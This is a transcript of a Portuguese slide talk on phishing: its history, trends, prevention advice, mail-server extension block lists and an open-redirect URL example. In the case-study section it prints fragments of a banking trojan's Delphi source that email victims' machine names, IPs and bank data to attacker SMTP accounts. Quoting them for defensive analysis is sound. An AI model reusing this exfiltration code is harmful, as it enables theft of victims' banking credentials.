Impacto e Análise de Phising. Humberto Sartini http://web.onda.com.br/humberto



Documentos relacionados
Impacto e Análise de Phising. Humberto Sartini

Tipos de pragas Virtuais; Como funciona os antivírus; Principais golpes virtuais; Profº Michel

Dicas de Segurança no uso de Computadores Desktops

Vírus é um programa. Sendo que este programa de computadores é criado para prejudicar o equipamento ou sabotar os dados nele existente.

3. Cópias de segurança de dados armazenados em um computador são importantes para se prevenir de eventuais falhas, como também das consequências de

Segurança em Computadores. GTI SEDU

Prefeitura do Campus USP de Pirassununga Seção Técnica de Informática

Segurança em Informática

Manual de Configuração de Ambiente para Utilização do Login via Certificado Digital no Cadastro Web

MALWARE. Spyware. Seguem algumas funcionalidades implementadas em spywares, que podem ter relação com o uso legítimo ou malicioso:

mais segurança na internet próximo Um guia para você tirar suas dúvidas sobre segurança na internet e proteger sua empresa.

GERADOR DE RELATÓRIOS

Privacidade. <Nome> <Instituição> < >

Acesse o Portal da Instituição ( e clique na figura.

CORREIO inotes. Para acessar o Correio inotes é necessário acessar a Internet.


Revisão 7 Junho de 2007

Dicas de como evitar o ataque de vírus

A segurança na utilização da Internet é um tema muito debatido nos dias atuais devido à grande quantidade de ladrões virtuais.

Aula 03 Malware (Parte 01) Visão Geral. Prof. Paulo A. Neukamp

Manual do Usuário Certificação

Sistema integrado de Aquisição de Vale-transporte para Cartões Eletrônicos. SBCTrans

SISTEMAS OPERACIONAIS LIVRES. Professor Carlos Muniz


Guia de Uso para Registro de Chamado Usuário Externo

Procedimentos para Instalação da DES 3.0.

MANUAL DE EMISSÃO DO CERTIFICADO TIPO A1

Segurança em Internet Banking. <Nome> <Instituição> < >

Gerenciador Eletrônico de Documentos (GED) (Manual de Instalação)

Códigos Maliciosos. <Nome> <Instituição> < >

Checklist COOKIES KEYLOGGER PATCHES R. INCIDENTE TECNOLOGIA SPAM INTERNET MA Cartilha de Segurança para Internet

Sistema de Gerenciamento de Arquivos (SGA) (Manual de Instalação)

Solicitação de Manutenção de Veículo. Manual SRM

Em informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta

Manual de Instalação ( Client / Server ) Versão 1.0

Segurança de Redes & Internet

MANUAL DO ADMINISTRADOR

Elaborado por Marcos Matos Revisado por C. Douglas de Souza e Carina Gonçalves Aprovado por Paulo Bernardi

Procedimentos para Instalação do Sisloc

Sistema de Chamados Protega

Cartilha de Segurança para Internet

Engenharia social. A arte de manipular

Entrar neste site/arquivo e estudar esse aplicativo Prof. Ricardo César de Carvalho

Códigos Maliciosos. Prof. MSc. Edilberto Silva

SISTEMA OPERACIONAL - WINDOWS

Manual de Operações Básicas. Thiago Passamani

WebMail Manual do cliente

Dez motivos......pelos quais sua empresa estará melhor protegida com a Avira.

Guia rápido do usuário. Cliente de Web

Manual de Operação do Sistema de Tickets Support Suite

Evolução dos Problemas de Segurança e Formas de Proteção

Manual (Office 365) Para acesso ao sistema de s, os passos iniciais continuam os mesmos.

Novidades do AVG 2013

Manual de Atualização

Conheça os crimes virtuais mais comuns em redes sociais e proteja-se

Procedimento para Atualização do DDFinance

13/3/2012. Prof. Flávio Ferry DIE UFPI

"Manual de Acesso ao Moodle - Discente" 2014

Procedimentos para Reinstalação do Sisloc

Curso Introdução à Educação Digital - Carga Horária: 40 horas (30 presenciais + 10 EaD)

Satélite. Manual de instalação e configuração. CENPECT Informática cenpect@cenpect.com.br

Procedimentos para Instalação do SISLOC

DIF-e - MANUAL DE ORIENTAÇÃO AO CONTRIBUINTE

MANUAL DE EMISSÃO E INSTALAÇÃO DO CERTIFICADO TIPO A1 (GOOGLE CHROME)

MANUAL DO ANIMAIL Terti Software

MANUAL DE INSTRUÇÕES. Versão 1.0. Visão Transportador

Renovação Online de Certificados Digitais A3 (Com Boleto Bancário)

Instalação e utilização do Document Distributor

Manual do Usuário. E-DOC Peticionamento Eletrônico TST

Área de Administração de Pagamento de Pessoal. Elsa dos Anjos Simões Diretora de Serviços

Como configurar s nos celulares. Ebook. Como configurar s no seu celular. W3alpha - Desenvolvimento e hospedagem na internet

MANUAL DO INSTAR-MAIL 1.0. Pagina de login e senha do Instar-Mail

Malwares. Algumas das diversas formas como os códigos maliciosos podem infectar ou comprometer um computador são:

Política de privacidade do Norton Community Watch

Cartilha de Segurança para Internet

ÍNDICE. 16/06/ :48 Leite Júnior

PJe Roteiro para configuração do computador Windows 7

Instalando software MÉDICO Online no servidor


START INTERNET ATIVIDADES - CAPÍTULO 1

Manual de Instalação Mozilla Thunderbird no DATASUS - RJ

FERRAMENTAS DE Usada para visualizar s (correio eletrônico).

DIA INTERNACIONAL DE SEGURANÇA EM INFORMÁTICA. Mantendo-se seguro em um mundo cada vez mais móvel. disi.rnp.br

Visão Geral sobre o tutorial de Utilização de

Instalação Cliente Notes 6.5

(eletronic mail )

EDITORA FERREIRA MP/RJ_EXERCÍCIOS 01

Está apto a utilizar o sistema, o usuário que tenha conhecimentos básicos de informática e navegação na internet.

Cartilha de Segurança para Internet Checklist

Sumário. Capítulo 2 Iniciando o TR Como efetuar o login... 8

Transcrição:

Impacto e Análise de Phising Humberto Sartini http://web.onda.com.br/humberto

Palestrante Humberto Sartini Analista de Segurança do Provedor OndaRPC Participante dos projetos: Rau-Tu Linux ( http://www.rau-tu.unicamp.br/linux ) HoneypotBR ( http://www.honeypot.com.br/ ) RootCheck ( http://www.ossec.net/rootcheck/ ) Participante do: IV e V Fórum Internacional de SL Conferência Internacional de SL ( Curitiba - 2003 ) Conisli (São Paulo/SP 2004) Latinoware (Curitiba - 2005)

Tópicos O que é Phising? História do Phising Cenário Atual Motivação do Phiser Como o usuário pode se prevenir? O que o administrador pode fazer? Impactos causados Exemplos Análise de Phising em tempo real

O que é Phising? É um termo criado para descrever o tipo de fraude que se dá através do envio de mensagem não solicitada, que se passa por comunicação de uma instituição conhecida e que procura induzir o acesso a páginas e/ou programas fraudulentos, projetados para furtar dados pessoais e financeiros de usuários. Fonte: http://cartilha.cert.br/

O que é Phising? A palavra Phising (de fishing ) vem de uma analogia criada pelos fraudadores, onde iscas (e-mails) são usados para pescar senhas e dados financeiros de usuários da Internet. Fonte: http://cartilha.cert.br/

História do Phising Em janeiro de 1996 aparecimento do termo Phising no NewsGroup da 2600 Magazine AOL 1990: Criação de contas com dados falsos (Nome, Número de Cartão de Crédito, etc...) 1995: Utilização de Força-Bruta 1997: E-mail Suporte AOL solicitando dados de usuário e senha. Fonte: Wikipedia

Cenário Atual Formas de Envio Através de E-mails (quase que a totalidade) Sites com códigos maliciosos que aproveitam falhas de segurança de Navegadores, Leitores de E-mails e Sistemas Operacionais Sites com brechas de segurança (PHP Nuke, FormMail,...) Programas de Mensagem Instantânea (MSN, AIM, ICQ,...) Combinação de duas ou mais técnicas

Cenário Atual Facilidades encontradas pelo Phiser: Código fonte de vários Phising/Scam em várias linguagens Compactador de EXE (Petite) Versões bugadas de Softwares Ingenuidade (??) do usuário

Cenário Atual Facilidades encontradas pelo Phiser: Burrocracia das Grandes Provedores Operadoras e Delegacias Virtuais despreparadas e sem equipamentos

Cenário Atual Crescimento de Fraudes 65,00 60,00 55,00 50,00 Af 45,00 Aw 40,00 Dos 35,00 Fraude 30,00 Invasão Scan 25,00 Worm 20,00 15,00 10,00 5,00 0,00 2002 2003 2004 2005

Motivação do Phiser

Motivação do Phiser Impunidade Legislação Falha ( Nacional e Internacional ) Máquinas Escravas x Pichação de Sites Aluguel de BOTNET ($$$)

Como o usuário pode se prevenir? Browsers Manter o browser sempre atualizado Desativar a execução de programas Java, JavaScripts, ActiveX e Janelas pop-up Somente acessar sites de instituições financeiras e de comércio eletrônico digitando o endereço diretamente no seu browser Fonte: http://cartilha.cert.br

Como o usuário pode se prevenir? Leitores de E-mails Manter sempre a versão mais atualizada do programa leitor de e-mails Não clicar em links que, por ventura, possam aparecer no conteúdo do e-mail Evitar abrir arquivos ou executar programas anexados aos e-mails Desconfiar sempre dos arquivos anexados à mensagem, mesmo que tenham sido enviados por pessoas ou instituições conhecidas Fonte: http://cartilha.cert.br

O que o administrador pode fazer? É fundamental para amenizar os impactos causados pelos Phisings / Scams Notificar o incidente para os contatos da rede e para os grupos de segurança das redes envolvidas, além de copiar o e-mail para o Cert.br Efetuar configurações especificas para não permitir e/ou amenizar a propagação dos Phisings / Scams

O que o administrador pode fazer? Servidores de E-mails Atenção especial aos e-mails com os seguintes anexos: bat, chm, exe, hlp, lnk, pif, reg, scr, shs, vbe, vbs, wsf e wsh Atenção especial aos e-mails com link apontando para arquivos com as seguintes extensões: bat, pif e scr Ativação da checagem de DNS Reverso, HELO, Listas RBL e SPF

O que o administrador pode fazer? Servidores de Páginas Alteração de Mime Type de arquivos com extensão duvidosas (bat, com, pif, scr) Atenção a CGI (FormMail)e PHP (Php Nuke) Eliminar Cross Site Scripting

http://www.brturbo.com.br/includes/barrap.jsp?c=ffffff&url=http://www.pop.com.br/b arra.php?url=http://www.oi.com.br/services/po/frameset/frameset.php?url=http://www.ibest.com.br/site/parceiros/estadao.jsp?link=http://www.ibest.estadao.com.br/agestado/?i=1

Impactos causados Perda de Produtividade Consumo de recursos computacionais (processamento, armazenamento, banda, etc...) Golpes e Fraudes Ameaça a Segurança da Informação

Exemplos e Casos Reais Todos os exemplos de Phisings, e muitos outros, estão no site: http://web.onda.com.br/humberto

Análise de Artefato 100,00 90,00 Kaspersky TheHacker NOD32v2 Avast VBA32 Symantec Sybari F-Prot DrWeb 80,00 McAfee 70,00 CAT-QuickHeal Fortinet 60,00 BitDefender 50,00 Ikarus 40,00 AntiVir Avira AVG 30,00 ClamAV 20,00 Panda 10,00 etrust-iris 0,00 Sophos Norman Porc. (%)

Exemplos e Casos Reais Agora serão mostradas alguns trechos dos códigos fontes dos softwares utilizados Esse software simula os seguintes bancos: BB, Real, Itau, Bradesco, Caixa, Unibanco, UniEmpresa, Banespa, Santander, BBJuridica, BEC, BRB, NossaCaixa, Banrisul, BancoRural e Nordeste

Exemplos e Casos Reais computador:=nomecomputador; messagebody.body.add('nome do Computador: ' + computador + ' Infected' ); messagebody.body.add('ip: '+ GetIP +' '); messagebody.body.add('data: '+ datetostr(now) +' Hora: '+ timetostr(time) +' '); messagebody.from.name := 'Makina: ' + computador; messagebody.recipients.emailaddresses := 'XXXXXXXX@XXX.com'; messagebody.subject := computador + ' Infectado'; SMTP.Host := 'smtp.xxxx.com.br'; SMTP.AuthenticationType := atlogin; SMTP.Username := 'XXXXXX'; SMTP.Password := 'XXXXXX'; SMTP.Port := 25; smtp.connect; Try smtp.send(messagebody); except SMTP.Host :='mx2.mail.yahoo.com';

Exemplos e Casos Reais SMTP.Host := 'smtp.xxxx.com.br'; // põe aqui o seu smtp SMTP.AuthenticationType := atlogin; SMTP.Port:= 25; SMTP.Username := 'XXXXXXXX'; // o user SMTP.Password := 'XXXXXXXX'; // a senha try SMTP.Connect; except self.close; end; with messagebody do begin From.Text := 'h3llm45t3rr'; From.Address := 'h3llm45t3rr@xxxx.com.br'; // Recipients.EMailAddresses := 'XXXXXX@XXX.com'; // Quem receberá as info Subject := 'bank Accounts'; //antes reflita q o CrAzY é o maior dos maiores ^^ Body.AddStrings(Dados); end;

Análise de Phising em tempo real Fedora Core 4 Windows 98 Apache Internet Explorer 6 Dsniff Ethereal Qemu TcpDump

Contato Através do site ou e-mail http://web.onda.com.br/humberto humberto@onda.com.br

Créditos Sites consultados: Cert.br Cartilha de Segurança para Internet http://cartilha.cert.br/ Fedora http://fedora.redhat.com RNP http://www.rnp.br/noticias/imprensa/2005/not imp abril2005 coord.html Spam Cost Calculator http://www.cmsconnect.com/marketing/spamcalc.htm Wikipedia http://en.wikipedia.org/wiki/phishing

Créditos Figura Slide 1: http://pcforalla.idg.se/articlepages/200504/04/20050404084028_pfa/phising.jpg Figura Slide 10 Dados obtidos em: http://www.cert.br/stats/incidentes/ Figura Slide 11: http://www.sindpdce.org.br/imagens/noticias/dinheiro.gif Figura Slide 22 e 23: http://www.cmsconnect.com/marketing/spamcalc.htm Outras Figuras: Arquivo particular